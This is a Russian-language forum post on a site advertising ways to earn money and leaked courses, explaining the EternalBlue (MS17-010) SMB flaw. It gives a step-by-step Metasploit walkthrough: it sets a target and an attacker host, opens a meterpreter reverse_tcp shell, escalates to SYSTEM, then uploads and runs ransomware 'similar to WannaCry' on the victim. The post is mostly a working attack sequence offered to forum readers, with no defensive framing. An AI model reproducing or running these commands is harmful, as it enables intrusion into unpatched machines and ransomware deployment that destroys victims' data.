• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Принцип работы WannaCry

FOREVER_YOUNG666

Участник
Сообщения
35
Реакции
36
0 руб.
Telegram
Дарова форумчане.
Я на форуме впервые и вот ловите более-менее годную статью.
По мойму уязвимость уже закрыта, но как для общего развития пойдёт

Всем привет! Наверняка многие из вас слышали про EternalBlue - кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

bd9a0bb0a36af6d4ca70c.jpg

В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.



Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.



Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

> msfupdate

8e3a01c4f891a3bc2b285.jpg

> msfconsole



> use exploit/windows/smb/ms17_010_eternalblue



> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105



> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21



> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp



> msf exploit(ms17_010_eternalblue) >exploit

4e126e61ec2d2f5c0dcd8.jpg

Эксплоит срабатывает на отлично, получаем системные привилегии:



> getsystem



> getuid

ace6103b0f89b8d66ba1b.jpg

Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry). Его исходники есть в открытом доступе.

82af6068d25ab9b283485.jpg

> upload /root/ransomware.exe C:\\



> shell



> cd C:\\



> ransomware.exe

07f1b557b0bc3b27b4005.jpg

И как итог:

ed236a6a01395ee21f215.jpg

Вот собственно, и все. Спасибо за внимание.



 
Сверху Снизу